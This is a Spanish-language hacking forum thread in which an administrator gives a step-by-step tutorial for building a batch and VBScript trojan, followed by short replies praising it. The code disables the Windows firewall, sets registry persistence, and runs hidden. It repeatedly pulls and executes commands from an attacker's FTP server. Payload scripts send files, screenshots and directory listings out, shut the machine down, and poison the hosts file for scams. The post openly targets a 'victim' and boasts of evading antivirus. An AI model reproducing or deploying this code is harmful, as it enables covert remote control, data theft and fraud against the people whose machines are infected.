Solicitamos su permiso para obtener datos estadísticos de su navegación en esta web, en cumplimiento del Real Decreto-ley 13/2012. Si continúa navegando consideramos que acepta el uso de cookies.

Aceptar Más información
WINTXCODERS Terminal
[[email protected] ~]:$ Bienvenido a la comunidad
Recuerda que puedes participar en nuestra comunidad registrándote

Autor Tema:  De todo un poco batch  (Leído 370 veces)

0 Usuarios y 1 Visitante están viendo este tema.

WIитX

  • Administrador
  • Desconectado
  • *
  • 1370
    7478
    72
  • Texto personal
    I'm not a hacker I'm security professional.
    • Ver Perfil
    • WINTXCODERS.COM
De todo un poco batch
« en: Enero 10, 2015, 04:16:08 pm »
Hola, en este post voy a explicar como crear una especie de troyano en batch y algo de vbs con el cual podremos ejecutar archivos de comandos de forma oculta en equipos remotos y en la mayoria de los casos este tipo de troyano no sera detectado por el antivirus.

Primero necesitamos crear un servidor FTP, por ejemplo en
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
ya que es necesario que se permita alojar archivos .bat, .exe, etc... y por ejemplo este hosting si lo permite.
una vez creado el servidor FTP (no doi muchos datos del proceso porque es bien facil) vamos a pasar a crear el servidor del troyano, asi que abrimos el bloc de notas y copiamos el siguiente codigo:

NOTA: el funcionamiento del script sera ir conectando de forma reiterada al servidor FTP y si existe el archivo code.bat y lo descarga y lo ejecuta, si no lo vuelve a intentar.

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
cd %windir%
echo @echo off>server.bat
echo netsh firewall set opmode disable>>server.bat
echo :code>>server.bat
echo cls>>server.bat
echo ping -n 45 127.0.0.1^>nul>>server.bat
echo echo user^>ftp.txt>>server.bat
echo echo pass^>^>ftp.txt>>server.bat
echo echo get code.bat^>^>ftp.txt>>server.bat
echo echo del code.bat^>^>ftp.txt>>server.bat
echo echo bye^>^>ftp.txt>>server.bat
echo echo quit^>^>ftp.txt>>server.bat
echo ftp -s:ftp.txt 111.222.333.444>>server.bat
echo call :bytes code.bat>>server.bat
echo :bytes>>server.bat
echo if ^["%%~z1"^] GTR ^["1"^] (goto :true^) else (goto :false^)>>server.bat
echo :true>>server.bat
echo del /f /q ftp.txt>>server.bat
echo start code.vbs>>server.bat
echo goto :code>>server.bat
echo :false>>server.bat
echo del /f /q ftp.txt>>server.bat
echo del /f /q code.bat>>server.bat
echo goto :code>>server.bat
echo set objshell = createobject ("wscript.shell")>code.vbs
echo objshell.run "code.bat", vbhide>>code.vbs
echo set objshell = createobject ("wscript.shell")>server.vbs
echo objshell.run "server.bat", vbhide>>server.vbs
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ftp /d %windir%\server.vbs
start server.vbs
del /f /q %0


en el debemos reemplazar:

user, pass y 111.222.333.444 por el nombre de usuario, clave y dirección IP del servidor FTP, y lo guardamos con extension .bat

Ahora solo queda conseguir que la "victima" ejecute este archivo .bat que es el servidor, una vez infectada para realizar acciones en el equipo remoto solo debemos subir a la raiz del servidor FTP un archivo de comandos nombrado code.bat, cuando el archivo ya no este en el servidor FTP quedra decir que ya ha sido descargado al equipo de la victima y se ha ejecutado, y por tanto podremos poner otro si queremos.

A continuacion pongo algunos codes en batch que simulan algunas de las acciones mas comunes de un troyano:

Apagar equipo:

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
shutdown -s -t 00
del /f /q %0


Cerrar proceso:

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
taskkill /f /im proceso.exe
del /f /q %0


Subir archivo:

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
echo user>ftp1.txt
echo pass>>ftp1.txt
echo get archivodelftp>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
start archivodelftp
del /f /q %0


Descargar archivo:

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
echo user>ftp1.txt
echo pass>>ftp1.txt
echo put "ruta archivo">>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q %0


Capturar pantalla: (necesita que anteriormente le hayais instalado nircmd)

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
nircmd.exe savescreenshot imagen.jpg
echo user>ftp1.txt
echo pass>>ftp1.txt
echo put imagen.jpg>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q imagen.jpg
del /f /q %0


Ver carpetas importantes del equipo:

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
cd %windir%
echo. >lista.txt
cd %programfiles%
dir /a>>%windir%\lista.txt
cd %userprofile%\Mis documentos
dir /a /s>>%windir%\lista.txt
cd %userprofile%\Escritorio
dir /a /s>>%windir%\lista.txt
cd %windir%
echo user>ftp1.txt
echo pass>>ftp1.txt
echo put lista.txt>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q %0


Infectar con scam (al archivo hosts)

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
echo 111.111.111.111 http://weboriginal.com >>%windir%\system32\drivers\etc\hosts
echo 111.111.111.111 www.weboriginal.com >>%windir%\system32\drivers\etc\hosts
echo 111.111.111.111 weboriginal.com >>%windir%\system32\drivers\etc\hosts
del /f /q %0


Dejar hosts limpios (quitar scams)

Código:

Código:
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
@echo off
cd %windir%\system32\drivers\etc
del /f /q hosts
echo user>ftp1.txt
echo pass>>ftp1.txt
echo get hosts>>ftp1.txt
echo bye>>ftp1.txt
echo quit>>ftp1.txt
ftp -s:ftp1.txt 111.111.111.111
del /f /q ftp1.txt
del /f /q %0


Espero que sea util, salu2

cualquier duda o sugerencia postearla.
Entrar a la web
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
Dudas / Sugerencias: [email protected]

PAYASAKX

  • Moderador Global
  • Desconectado
  • *
  • 451
    259
    11
  • Texto personal
    KNOWLEDGE is FREE.
    • Ver Perfil
Re:De todo un poco batch
« Respuesta #1 en: Enero 13, 2015, 09:46:42 pm »
Muy interesante este tutorial, es de las pocas veces que veo un Troyano programado en Batch, me parece super interesante esto del Batch, ya que puedes hacer muchas cosas con él.



WIитX

  • Administrador
  • Desconectado
  • *
  • 1370
    7478
    72
  • Texto personal
    I'm not a hacker I'm security professional.
    • Ver Perfil
    • WINTXCODERS.COM
Re:De todo un poco batch
« Respuesta #2 en: Enero 13, 2015, 10:26:01 pm »
Debería de ser más correcto llamarle un script en vez de troyano pero bueno ^^
Entrar a la web
Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
Dudas / Sugerencias: [email protected]

PAYASAKX

  • Moderador Global
  • Desconectado
  • *
  • 451
    259
    11
  • Texto personal
    KNOWLEDGE is FREE.
    • Ver Perfil
Re:De todo un poco batch
« Respuesta #3 en: Enero 13, 2015, 10:48:16 pm »

Para poder ver los links necesitas estar [• Registrado •]
[• Iniciar Sesión •]
Debería de ser más correcto llamarle un script en vez de troyano pero bueno ^^
mm Sí, yo tambien lo llamaria script, pero el post es tuyo jeje, corrige si quieres .

PD; Tengo que probarlo eh.



 

Powered by Advanced Topic Prefix Pro